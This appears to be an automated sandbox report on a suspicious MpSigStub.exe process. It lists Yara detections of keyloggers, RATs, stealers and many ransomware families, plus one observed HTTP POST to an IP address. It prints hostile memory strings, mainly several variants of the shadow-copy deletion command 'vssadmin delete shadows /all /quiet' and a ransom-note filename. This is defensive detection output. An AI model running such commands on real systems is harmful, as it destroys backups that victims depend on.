Source: unknown HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 5.181.156.229

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Creates a DirectInput object (often for capturing keystrokes)
Source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp Binary or memory string: DirectDrawCreateEx
Installs a raw input device (often for capturing keystrokes)
Source: MpSigStub.exe, 0000000B.00000003.18266135814.0000021B5EBFB000.00000004.00000001.sdmp Binary or memory string: GetRawInputData

E-Banking Fraud:

barindex
Yara detected Njrat
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18271295741.0000021B5FAF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

barindex
Yara detected BlackMoon Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Ragnarok ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Wannacry ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected MegaCortex Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Babuk Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Nemty Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Snatch Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected AESCRYPT Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected RansomwareGeneric
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Gocoder ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected WannaRen ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Conti ransomware
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef9a849.112.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef9be4d.110.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef99445.153.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef9a849.152.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef9be4d.151.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef99445.124.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef99445.111.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef9be4d.125.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef9a849.126.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18295010840.0000021B5EF98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18291811520.0000021B5EF98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18321956088.0000021B5EDCA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Phorpiex smb component
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Clop Ransomware
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Ryuk ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Cerber ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Rhino ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Voidcrypt Ransomware
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18297885481.0000021B5F796000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected GoGoogle ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Delta Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Cryptolocker ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Found string related to ransomware
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp Binary or memory string: &act=gettext&lang=
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp Binary or memory string: &encrypted=
May drop file containing decryption instructions (likely related to ransomware)
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp Binary or memory string: HELP_instructions.html
Deletes shadow drive data (may be related to ransomware)
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: %vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp Binary or memory string: vssadmin Delete Shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /for=
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp Binary or memory string: /C vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp Binary or memory string: vssadmindeleteshadows
Source: MpSigStub.exe, 0000000B.00000003.18301444780.0000021B5E291000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 0000000B.00000003.18271295741.0000021B5FAF1000.00000004.00000001.sdmp Binary or memory string: Nvssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp Binary or memory string: 'vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp Binary or memory string: vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp Binary or memory string: !vssadmindeleteshadows/all/quiet

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 11.3.MpSigStub.exe.21b5e21e0f6.18.raw.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e61fb1a.216.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5fecf96e.186.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 11.3.MpSigStub.exe.21b5fb37126.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f62017a.26.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e1d7add.180.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fed0d72.115.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 11.3.MpSigStub.exe.21b5e61fb1a.194.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5e1d6a89.179.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fe6a936.114.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 11.3.MpSigStub.exe.21b5e7207f6.69.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fece56a.117.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 11.3.MpSigStub.exe.21b5e61fb1a.149.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: Detects ISMDoor Backdoor Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e61fb1a.149.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5e61fb1a.194.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5fecf96e.116.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5e1c2bca.202.raw.unpack, type: UNPACKEDPE Matched rule: Rule to detect Duqu 2.0 samples Author: unknown
Source: 11.3.MpSigStub.exe.21b5e21ccf2.17.raw.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e61fb1a.206.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: Keylogger component Author: Microsoft
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5eec4df6.63.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 11.3.MpSigStub.exe.21b5eec4df6.63.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e21e0f6.18.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fb38b2a.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f3c65aa.44.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: Keylogger component Author: Microsoft
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fe69132.113.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 11.3.MpSigStub.exe.21b5e5ccab6.147.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5f3c57a6.43.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e61fb1a.206.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5e721bfe.71.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5e1d93b1.181.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fece56a.185.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 11.3.MpSigStub.exe.21b5f3c49a2.45.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: Keylogger component Author: Microsoft
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f568236.104.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e61fb1a.216.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 11.3.MpSigStub.exe.21b5f62017a.58.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5fed0d72.184.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 11.3.MpSigStub.exe.21b5e1c15c6.201.raw.unpack, type: UNPACKEDPE Matched rule: Rule to detect Duqu 2.0 samples Author: unknown
Source: 11.3.MpSigStub.exe.21b5e21f4fa.19.raw.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e7211fa.70.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e4bf197.154.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 11.3.MpSigStub.exe.21b5e4bf197.154.unpack, type: UNPACKEDPE Matched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
Source: 11.3.MpSigStub.exe.21b5eec4df6.95.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 11.3.MpSigStub.exe.21b5eec4df6.95.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5e4bcb15.155.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 11.3.MpSigStub.exe.21b5e4bcb15.155.unpack, type: UNPACKEDPE Matched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
Source: 11.3.MpSigStub.exe.21b5eec4df6.209.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 11.3.MpSigStub.exe.21b5eec4df6.209.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp, type: MEMORY Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 0000000B.00000003.18271592322.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 0000000B.00000003.18274401983.0000021B5F6D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 0000000B.00000003.18306005609.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Tofu Trojan Author: Cylance
Source: 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp, type: MEMORY Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Source: 0000000B.00000003.18261319669.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 0000000B.00000003.18284863225.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 0000000B.00000003.18312010559.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 0000000B.00000003.18317798030.0000021B5E551000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Tofu Trojan Author: Cylance
Source: 0000000B.00000003.18322267156.0000021B5F6D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 0000000B.00000003.18278226414.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp, type: MEMORY Matched rule: Keylogger component Author: Microsoft
Source: 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 0000000B.00000003.18292386350.0000021B5F01C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 0000000B.00000003.18293242978.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
